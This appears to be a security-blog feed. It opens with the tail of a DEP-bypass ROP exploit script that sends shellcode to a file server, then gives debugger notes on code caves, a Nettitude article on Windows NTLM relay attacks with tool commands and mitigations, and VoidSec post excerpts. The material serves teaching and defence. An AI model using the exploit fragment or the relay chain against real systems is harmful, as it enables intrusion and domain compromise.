rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop1)-4, 4):
	  rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

rop2 = b""
rop2 += p32(binary_base + 0x159d)*(10) # ropnop
for g in rop_setup:
	print(hex(g))
	rop2 += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += rop2
buf += sc
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close() 

Misc

Finding a codecave

A codecave is an (executable) memory area of a binary that is unused and can be used to host attacker provided code. We can find the code section as follows:

0:001> dd filesrv + 3c L1
3fab003c  000000f8
0:001> dd filesrv + f8 + 2c L1
3fab0124  00001000
0:001> ? filesrv+1000
Evaluate expression: 1068175360 = 3fab1000
0:001> !vprot 3fab1000
BaseAddress:       3fab1000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        0008f000
State:             00001000  MEM_COMMIT
Protect:           00000020  PAGE_EXECUTE_READ
Type:              01000000  MEM_IMAGE

Now we can use some unused area between 3fab1000 and 3fab1000+0008f000=3FB40000. A good place to look is towards the end, but really you can use anything if you are confident the binary does not crash when you overwrite it, or if you don’t care.
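
The two `dd` commands above read fields of the PE header: the dword at offset 0x3c of the image is e_lfanew (the offset of the PE signature), and the dword at e_lfanew + 0x2c is BaseOfCode in the optional header. The same lookup can be done offline on a copy of the binary. The following is a minimal sketch with hypothetical function names; it only handles the two fields used here, and the demo runs on a synthetic header instead of the real filesrv binary.

```python
import struct


def base_of_code(image: bytes) -> int:
    """Return the BaseOfCode RVA from a PE image (file or memory dump)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3c)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # 4 bytes signature + 20 bytes COFF header + 0x14 into the optional header
    return struct.unpack_from("<I", image, e_lfanew + 0x2c)[0]


def code_range(image_base: int, rva: int, region_size: int):
    """Start and end address of the executable region."""
    start = image_base + rva
    return start, start + region_size


if __name__ == "__main__":
    # Synthetic header with the values seen in the debugger output above.
    fake = bytearray(0x200)
    fake[0:2] = b"MZ"
    struct.pack_into("<I", fake, 0x3c, 0xf8)
    fake[0xf8:0xfc] = b"PE\x00\x00"
    struct.pack_into("<I", fake, 0xf8 + 0x2c, 0x1000)

    rva = base_of_code(bytes(fake))
    start, end = code_range(0x3fab0000, rva, 0x8f000)
    print(hex(rva), hex(start), hex(end))
```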

Finding a writable address

Often you need writeable addresses when calling Windows API functions because they return data that way. To find one, we can look at the .data section and choose something that is likely not used:

!dh filesrv
...
SECTION HEADER #3
   .data name
    332C virtual size
   A6000 virtual address
    1E00 size of raw data
   A5400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
...
0:001> ? filesrv + A6000 + 332C + 4
Evaluate expression: 1068864304 = 3fb59330
0:001> dd 3fb59330
3fb59330  00000000 00000000 00000000 00000000
!vprot 3fb59330
BaseAddress:       3fb59000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        00001000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              01000000  MEM_IMAGE
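
The address above is just “image base + section RVA + virtual size + a little padding”: sections are mapped in whole pages, so the bytes between the end of the section's virtual size and the end of its last page are mapped with the same protection but normally unused. A small sketch of that calculation, using the values from the `!dh` output; the function name and the 4-byte padding default are assumptions for illustration.

```python
PAGE = 0x1000


def slack_after_section(image_base: int, virtual_address: int,
                        virtual_size: int, pad: int = 4):
    """Return (candidate address, bytes of slack left in the page after it)."""
    end_rva = virtual_address + virtual_size
    page_end_rva = (end_rva + PAGE - 1) & ~(PAGE - 1)   # round up to page size
    candidate = image_base + end_rva + pad
    slack = page_end_rva - end_rva - pad
    return candidate, slack


if __name__ == "__main__":
    addr, slack = slack_after_section(0x3fab0000, 0xA6000, 0x332C)
    print(hex(addr), hex(slack))
```

It is still worth confirming with `!vprot` and a memory dump, as done above, that the chosen address is really writable and zeroed at the time the exploit runs.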

Finding ROP Gadgets

I had a lot of success with ropper and its interactive console. Another good alternative is rp++.

References

This binary was used for a vulnerable machine on the vulndev discord server that is available for patreon subscribers.

The post Bypassing DEP with WriteProcessMemory (x86) appeared first on Vulndev.

Network Relaying Abuse in a Windows Domain

31 August 2022 at 09:00

Network relaying abuse in the context of a legacy Windows authentication protocol is by no means a novel vector for privilege escalation in a domain context. However, in spite of these techniques being well understood and documented for many years, it is unfortunately still common during the course of an internal network penetration test for Nettitude consultants to escalate from a low privileged user to Domain Admin in a matter of hours (or even minutes). This is due to a handful of Active Directory and internal network misconfigurations which this article will explore.

Through the course of four scenarios, we’ll cover both longstanding and more recent attack primitives that center around relaying techniques in the hopes that network defenders can apply the mitigations contained therein.

Scenario 1 – LLMNR/NBT-NS Poisoning

Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are alternative resolution protocols used to derive a machine’s IP address given its hostname on the network.

LLMNR, which is based upon the DNS format, enables name resolution in link-local scenarios and has been around since the dawn of Windows Vista. It is the spiritual successor to NBT-NS, which uses a system’s NetBIOS name to identify it on the network.

In general, name resolution (NR) protocols stand as the final fallback should suitable records not be found in local host files, DNS caches, or the configured DNS servers. One can think of the purpose of NR protocols as allowing a host to broadly query its neighbors over multicast: “Hey, does anyone have x resource, as I can’t find it anywhere else?”

These queries are sent out to the local network segment; however, no measures are taken to verify the integrity of the responses or of the hosts that provide them, since Microsoft views the network as a trust boundary. As such, malicious actors can take advantage of what is essentially a race condition and interpose themselves as an authoritative source for name resolution by replying to LLMNR (UDP 5355)/NBT-NS (UDP 137) requests with popular open-source offensive tooling such as Responder. Crucially, if the requested resource requires authentication, the victim’s username and NetNTLM hash are summarily sent to the adversary’s spoofed authoritative node.

Mistyping, misconfigurations (either on the DNS server or client side), WPAD, or even Google Chrome can easily lead to a scenario in which the client machine relies on multicast name resolution queries and gifts a malicious man-in-the-middle its coveted hash.

In this demonstration, the attacker sets up Responder listening on eth0 and with the -wF flags to start the WPAD rogue proxy server and force NTLM authentication on wpad.dat file retrieval:

Shortly thereafter, the victim (on client01 at 192.168.136.133) requests a shared resource via SMB with an unfortunate misspelling:

As demonstrated below, the attacker then responds to the name resolution query initiated by the victim via LLMNR, naming himself as the recipient and receiving the victim’s credentials in return:

From here, the user’s hash can either be cracked offline using a hash cracker like Hashcat or possibly relayed further in the environment to authenticate to other network resources via relay attacks, should mitigations such as SMB signing be disabled.

Mitigations:

To disable LLMNR:

  1. Open the Group Policy Editor and navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client.
  2. Ensure that the option “Turn OFF Multicast Name Resolution” is enabled.

To disable NBT-NS on Windows clients:

  1. Open your Network Connections and view the properties of the network adapter.
  2. Select TCP/IPv4 and select “Properties.”
  3. Select “Advanced” on the “General” tab and navigate to the WINS tab, then choose “Disable NetBIOS over TCP/IP.”
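
For defenders who want to verify the LLMNR setting on a host, the policy is reflected in the registry. The following sketch assumes the commonly documented location of that policy (the `EnableMulticast` value under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient`, where 0 means multicast name resolution is turned off); the function names are hypothetical and the registry read only works on Windows.

```python
import sys

POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\DNSClient"
POLICY_VALUE = "EnableMulticast"


def llmnr_disabled_by_policy(value) -> bool:
    """Interpret the policy value: only an explicit 0 disables LLMNR."""
    return value == 0


def read_policy_value():
    """Read the policy value from the registry, or None if it is not set."""
    import winreg  # Windows only, imported lazily on purpose
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY) as key:
            value, _value_type = winreg.QueryValueEx(key, POLICY_VALUE)
            return value
    except FileNotFoundError:
        return None


if __name__ == "__main__":
    if sys.platform == "win32":
        state = llmnr_disabled_by_policy(read_policy_value())
        print("LLMNR disabled by policy" if state else "LLMNR policy not enforced")
    else:
        print("registry check skipped: not running on Windows")
```

A missing value is treated as “not disabled”, since LLMNR is active unless the policy turns it off.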

Scenario 2 – NetNTLM Relay over SMB

Continuing our exploration of the potential consequences of LLMNR and NBT-NS broadcast traffic being present in the target environment, let’s turn our attention to relaying the NetNTLM hashes previously captured by Responder and see if more damage can be done.

Much like wine and cheese, Responder and ntlmrelayx from the Impacket suite are the perennial pairing here. The idea is that an attacker can opt to relay a captured NetNTLM hash to any system on the network that has SMB signing turned off, which is the default setting on Windows clients.

After configuring Responder with its SMB and HTTP server deactivated (which can typically be done by editing /etc/responder/Responder.conf) and running the module via CLI as before (responder -I eth0 -wF), the attacker can then set up ntlmrelayx to listen for incoming connections with smb2 support enabled:

In this simulated scenario, an administrator on DC01 (192.168.136.132) mistypes a network share, which leads to a successful relay of the NetNTLM hash to client01 (192.168.136.133) and the dumping of the SAM, or the Security Account Manager, which is a database present on Windows machines that stores local user accounts and authentication information:

Do be advised that from MS08-068 onwards, it is impossible to relay a NetNTLM hash back to the machine from which it originated; as such, in order for this attack to work, it is necessary to relay the hash originating from DC01 to client01.

Apart from dumping the computer’s SAM, which is disastrous in and of itself, an attacker could also elect to execute arbitrary commands on the target system or even spawn an SMB session on the host, which is what shall be demonstrated next. Upon successful relay of the administrator hash to client01, a malicious actor is presented with an interactive SMB client shell on 127.0.0.1:11000 after specifying the -i flag when deploying ntlmrelayx:

From here, the attacker has full access to the C$ drive and can amplify their foothold on the network by deploying a remote access trojan (RAT) or even proliferating ransomware through the network’s file system:

Mitigations:

  1. The steadfast advice from Microsoft when it comes to any variant of the classic NTLM relay attack is to migrate from the natively vulnerable NTLM challenge-response authentication to the far more secure method of Kerberos authentication when possible. Kerberos has been Microsoft’s preferred replacement for NTLM since the inception of Windows 2000.
  2. For those organizations that must use NTLM in their environments, it is recommended that EPA (Extended Protection for Authentication) and SMB signing are enabled, which in conjunction can vastly blunt the possibility of NTLM relay attacks.

Scenario 3 – IPv6 Carnage

Another common man-in-the-middle privilege escalation vector that poses a risk in an enterprise domain context stems from the abuse of IPv6, which is enabled by default on modern Windows operating systems and has taken precedence over its predecessor IPv4 since the release of Vista. As such, systems internally poll the network for IPv6 leases, which plays into an attack vector still ripe with potential in 2022. For a step-by-step breakdown of how this all works:

  1. An IPv6 client periodically sends out solicit packets on the local network, seeking an IPv6 router.
  2. When an IPv6 router is present, it sends out an advertise packet in response to the solicit packet. This advertise packet informs the client that the IPv6 router is available for DHCP services.
  3. The IPv6 client replies with a request packet to the DHCPv6 server, asking for an IPv6 configuration.
  4. Finally, the DHCPv6 server issues the IPv6 configuration to the IPv6 client, which specifies several things, including the IP address, default gateway, DNS servers, etc. This is all included in the reply packet.
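
The four steps above correspond to the standard DHCPv6 message exchange. As a compact reference, the sketch below models that sequence with the message type codes defined for DHCPv6 (Solicit = 1, Advertise = 2, Request = 3, Reply = 7); the class and function names are hypothetical and nothing is sent on the network.

```python
from enum import IntEnum


class DHCPv6Msg(IntEnum):
    """Message types used in the four-message exchange."""
    SOLICIT = 1
    ADVERTISE = 2
    REQUEST = 3
    REPLY = 7


# (sender, message) in the order described in the list above.
EXCHANGE = [
    ("client", DHCPv6Msg.SOLICIT),
    ("server", DHCPv6Msg.ADVERTISE),
    ("client", DHCPv6Msg.REQUEST),
    ("server", DHCPv6Msg.REPLY),
]


def is_complete_exchange(messages) -> bool:
    """True if the observed message types form the full four-step exchange."""
    return list(messages) == [msg for _sender, msg in EXCHANGE]


if __name__ == "__main__":
    for sender, msg in EXCHANGE:
        print(f"{sender:>6} -> {msg.name} (type {int(msg)})")
```

In the attack described in this scenario, the “server” side of this exchange is answered by the attacker's machine, so the Reply carries an attacker-controlled DNS server.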

The idea with this attack, which utilizes Dirk-jan Mollema’s excellent research from 2018, is that a malicious actor can interpose their machine as an IPv6 router and force authentication to their server as the authoritative DNS server on the network over any other IPv4 servers. The attacker can then in tandem utilize ntlmrelayx to relay captured credentials to the specified target machine, leading to the dumping of sensitive domain information or possibly even the creation of additional computer accounts or escalated privileges.

To set up this scenario, mitm6 is launched listening on eth0 and targeting the lab.local domain along with the machine client01:

Shortly thereafter, the preferred IPv6 DNS server is displayed from the perspective of the command prompt of our client01 victim as being the attacker’s machine, where 192.168.136.132 is the IPv4 address of the lab.local domain controller:

From here, ntlmrelayx is launched targeting the relay to the domain controller with the following command, with the -6 flag ensuring that our ntlmrelayx listens for both IPv4 and IPv6 connections and the -wh flag specifying a non-existent WPAD file host:

ntlmrelayx.py -6 -t ldap://192.168.136.132 -wh netti-wpad.lab.local -l loot

After simulating the client machine rebooting and joining the network, it is observed that the attack successfully relays the client01 machine account against the DC:


This enables the attacker to gather and enumerate valuable information against the target domain environment, including group memberships, domain policies, and sensitive information disclosed in any AD object’s description fields, as demonstrated below:

It should be remarked that, while the scenario of the service account password being exposed in cleartext in the AD object’s description field is contrived for this example, it is unfortunately a practice that is still observed in modern-day engagements.

Now, while the aforementioned information dump about the targeted AD objects is certainly valuable, things can take a decisive turn for the worse should an attacker set up ntlmrelayx to relay over LDAPS. Relaying to LDAP over TLS offers an opportunity for quick compromise of an entire domain, as creating new accounts is not possible over unencrypted connections. Specifying the --delegate-access flag on ntlmrelayx and waiting for the victim to request an IPv6 address or a WPAD configuration leads to the following series of events in the attacker’s console:

Once the victim requests a new IPv6 address or WPAD configuration from the mitm6 server (this is often seen when the victim reboots their machine or plugs in their network cable again), the ntlmrelayx server receives the connection and creates a new computer account over LDAPS, which is permitted by the default AD setting which dictates that any domain user can add up to 10 computer accounts:

From here, the malicious actor can utilize getST.py from the impacket suite to take advantage of a classic resource-based constrained delegation attack vector in order to have the new computer account request service tickets for itself on behalf of any other user in the domain, including the administrator. The typical flow of this attack finishes with requesting a TGS for the CIFS service of the target computer while impersonating the domain administrator, then dumping the SAM with impacket’s secretsdump.py module, as previously demonstrated. In case the reader needs a refresher on the meaning of terms like TGS or a primer on Kerberos-based attacks, please consult this excellent resource as additional reading.

Should a user with functional permissions of domain admin log into one of the workstations in scope of the mitm6 attack, ntlmrelayx can be further weaponized to create a new enterprise administrator user; below, the domain administrator “henry” logs into the target machine, after which the authentication is relayed against the domain controller of the target environment:

Further in the output below, ntlmrelayx adds a new user with Replication-Get-Changes-All privileges:


At this point, it is game over for the domain’s integrity. An attacker can achieve complete domain compromise by dumping all domain user hashes from the Ntds.dit file, which is essentially the database at the heart of active directory:


Now that the wide-ranging ramifications of a simple IPv6 network configuration being left in its default state have been fully explored, let’s turn to mitigating the factors that make this attack chain possible. Because several components were abused along the way, there are several mitigation aspects to address.

Mitigations:

In summary, the mitm6 tool abuses the fact that Windows by default queries for an IPv6 address even in IPv4-only environments. If IPv6 is not in use internally, the surest way to prevent mitm6 attacks is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy, since disabling IPv6 entirely may have unwanted side effects. As quoted verbatim from the linked source article, setting the following predefined rules to Block instead of Allow prevents the attack from working:

  • (Inbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
  • (Inbound) Core Networking – Router Advertisement (ICMPv6-In)
  • (Outbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)

Mitigating WPAD abuse:

If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.

Mitigating relaying to LDAP:

Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.
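As a rough illustration of what "both" means in practice, the sketch below evaluates the two domain controller registry values that govern these settings. It assumes the values live under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters as `LDAPServerIntegrity` (2 meaning signing is required) and `LdapEnforceChannelBinding` (2 meaning channel binding is always enforced); the function name and the wording of the findings are hypothetical, and reading the values from a real host is left out.

```python
# Assumed registry values on a domain controller, under
# HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters:
#   LDAPServerIntegrity       -> 2 means LDAP signing is required
#   LdapEnforceChannelBinding -> 2 means channel binding is always enforced
REQUIRE_SIGNING = 2
ALWAYS_ENFORCE_CHANNEL_BINDING = 2


def ldap_relay_findings(ldap_server_integrity, ldap_enforce_channel_binding):
    # Return one finding per setting that still leaves a relay path open
    findings = []
    if ldap_server_integrity != REQUIRE_SIGNING:
        findings.append("LDAP signing is not required")
    if ldap_enforce_channel_binding != ALWAYS_ENFORCE_CHANNEL_BINDING:
        findings.append("LDAP channel binding is not always enforced")
    return findings
```

An empty list from `ldap_relay_findings(2, 2)` corresponds to the state recommended above. Any other combination returns at least one finding, reflecting that enabling only one of the two settings leaves either LDAP or LDAPS open to relaying.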

Mitigating resource-based delegation abuse:

As RBCD is part and parcel of intended Kerberos functionality, there is no one-click mitigation here. Most of the attack surface can however be reduced by adding administrative and key users to the Protected Users group or by marking their accounts as sensitive and ineligible for delegation.

Scenario 4 – Nothing but Certified Trouble

In the summer of 2021, SpecterOps researchers Will Schroeder and Lee Christensen published a deluge of information on the attack potential in inherently insecure Active Directory Certificate Services (hereafter ADCS, essentially Microsoft’s PKI implementation). While a full discussion of the eight attack mappings (ESC1 through ESC8) is outside of the scope of this blog post, it is worthwhile to explore ESC8 further as it stands as an excellent recent example of the continued potential for domain compromise that NTLM relay poses.

Essentially, this vulnerability arises from the fact that the web interface of ADCS allows NTLM authentication by default and does not enforce relay mitigations by default. If the certificate authority in the domain does indeed have the web enrolment feature enabled (which is typically exposed via http://<CA_SERVER>/certsrv/ once the Certificate Authority Web Enrolment role is installed on the server), then the attacker can carry out an NTLM relay to the HTTP endpoint. Per the linked SpecterOps resource:

“This attack, like all NTLM relay attacks, requires a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, but a simple technique is to coerce a machine account to authenticate to the attacker’s host using the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) methods using a tool like SpoolSample or Petitpotam. The attacker can then use NTLM relay to impersonate the machine account and request a client authentication certificate (e.g., the default Machine/Computer template) as the victim machine account. If the victim machine account can perform privileged actions such as domain replication (e.g., domain controllers or Exchange servers), the attacker could use this certificate to compromise the domain. Otherwise, the attacker could logon as the victim machine account and use S4U2Self as previously described to access the victim machine’s host OS.”
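To make the precondition concrete, the following sketch flags a web enrolment endpoint as worth reviewing when it is served over plain HTTP and advertises NTLM (or Negotiate, which can fall back to NTLM) in its `WWW-Authenticate` response headers. It is a minimal illustration rather than a scanner: the function names and the host `ca01.lab.local` are hypothetical, the header values are passed in by the caller instead of being fetched, and an HTTPS endpoint would still need its EPA setting checked separately, which this sketch cannot see.

```python
from urllib.parse import urlsplit


def certsrv_url(ca_host, scheme="http"):
    # Build the web enrolment URL for a given CA host (host name is caller-supplied)
    return f"{scheme}://{ca_host}/certsrv/"


def offered_schemes(www_authenticate_values):
    # Extract the authentication scheme name from each WWW-Authenticate header value
    return {
        value.strip().split(" ", 1)[0].lower()
        for value in www_authenticate_values
        if value.strip()
    }


def needs_review(url, www_authenticate_values):
    # Plain HTTP plus NTLM-capable authentication matches the condition described above
    ntlm_capable = bool(offered_schemes(www_authenticate_values) & {"ntlm", "negotiate"})
    plain_http = urlsplit(url).scheme == "http"
    return ntlm_capable and plain_http
```

For example, `needs_review(certsrv_url("ca01.lab.local"), ["Negotiate", "NTLM"])` evaluates to `True`, while the same headers on an `https` URL evaluate to `False` and defer to a manual EPA check.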

With the theory out of the way, let’s see this attack in action. First, from their initial foothold on the client01 machine as a low-privileged user, the attacker can use living-off-the-land binaries such as certutil.exe to enumerate certificate authorities in the domain:

From here, the attacker can set up ntlmrelayx to forward incoming forced authentications from DC01 to the HTTP endpoint for certificate enrolment; note that ExAndroidDev’s fork of Impacket with support for ADCS exploitation was utilized for this demonstration:

As the final step in the attack chain, the PowerShell implementation of PetitPotam is leveraged in order to coerce an authentication from DC01 to our relay server:

At this point, the CA issues a certificate for the DC01$ computer account, which is captured by the ntlmrelayx server:

With the hard work done and the base64-encoded certificate of the domain controller computer account in hand, the attacker can use Rubeus to request a Kerberos TGT for the DC01$ computer account. From there, the attacker can perform a DCSync to request the NTLM hash of the krbtgt user, achieving complete domain compromise and persistence.

Mitigations:

  1. Prior to releasing the offensive tooling for ADCS exploitation, SpecterOps released the PSPKIAudit auditing toolkit to enable defenders to proactively monitor their environments for potential ADCS misconfigurations. Please do recall that there are seven other scenarios for ADCS abuse which are outlined in the original SpecterOps whitepaper and not discussed in this blog post, so concerned blue team individuals are encouraged to read more here.
  2. Alongside reviewing the aforementioned resources, it is highly recommended that defenders enumerate the Web Enrolment interfaces in their environment (either with or without PSPKIAudit) and either enforce HTTPS and enable EPA on the IIS server endpoints or remove the endpoints if possible altogether.
  3. If not already doing so, defenders are encouraged to treat CA servers as tier 0 assets along with domain controllers from an asset management standpoint.

Conclusion

Owing to the fact that an attacker would need to have successfully leveraged another server-side vulnerability or a social-engineering attack to be in the position to relay credentials as a man-in-the-middle, hardening domain authentication and reducing superfluous network broadcast traffic stand as important components of Defence in Depth (DiD). While Microsoft may have worked to address the impact of some of these relay issues at different levels, it is nonetheless paramount that network administrators and defenders do their part to blunt the force of these vectors for potential domain takeover by following the mitigation advice on the subject. As there is no silver bullet to pre-emptively thwart every network attack primitive, the remedial guidance contained in this article can be followed as part of the multifaceted approach of DiD to secure the digital estate from domain compromise. Nettitude’s specialized internal infrastructure penetration testing services can also provide network stakeholders with world-class technical knowledge and tailored advice on remediating the issues explored here and beyond.

The post Network Relaying Abuse in a Windows Domain appeared first on Nettitude Labs.

Browser Exploitation: Firefox Integer Overflow – CVE-2011-2371

By: voidsec
21 July 2022 at 08:37

In case you’re wondering why I’m not posting as regularly as before, with the new year, I’ve finally transitioned into a fully offensive vulnerability research and exploit development role at Exodus Intelligence that fulfilled my career dream (BTW, we’re currently hiring). In the last couple of months, I’ve worked on some exciting and challenging bugs. […]

The post Browser Exploitation: Firefox Integer Overflow – CVE-2011-2371 appeared first on VoidSec.

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

Driver Buddy Reloaded

By: voidsec
27 October 2021 at 14:30

As part of my continuous security research journey, during this year I’ve spent a good amount of time reverse-engineering Windows drivers and exploiting kernel-mode related vulnerabilities. While in the past there were (as far as I know), at least two good IDA plugins aiding in the reverse engineering process: DriverBuddy of NCC Group. win_driver_plugin of […]

The post Driver Buddy Reloaded appeared first on VoidSec.

Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438

By: voidsec
28 July 2021 at 12:00

Last week SentinelOne disclosed a “high severity” flaw in HP, Samsung, and Xerox printer’s drivers (CVE-2021-3438); the blog post highlighted a vulnerable strncpy operation with a user-controllable size parameter but it did not explain the reverse engineering nor the exploitation phase of the issue. With this blog post, I would like to analyse the vulnerability […]

The post Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438 appeared first on VoidSec.

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

SLAE – Assignment #7: Custom Shellcode Crypter

By: voidsec
2 April 2020 at 14:55

Assignment #7: Custom Shellcode Crypter Seventh and last SLAE’s assignment requires to create a custom shellcode crypter. Since I had to implement an entire encryption schema both in python as an helper and in assembly as the main decryption routine, I’ve opted for something simple. I’ve chosen the Tiny Encryption Algorithm (TEA) as it does […]

The post SLAE – Assignment #7: Custom Shellcode Crypter appeared first on VoidSec.

SLAE – Assignment #6: Polymorphic Shellcode

By: voidsec
2 April 2020 at 14:39

Assignment #6: Polymorphic Shellcode Sixth SLAE’s assignment requires to create three different (polymorphic) shellcodes version starting from published Shell Storm’s examples. I’ve decided to take this three in exam:

  • http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes
  • http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes
  • http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) […]

The post SLAE – Assignment #6: Polymorphic Shellcode appeared first on VoidSec.
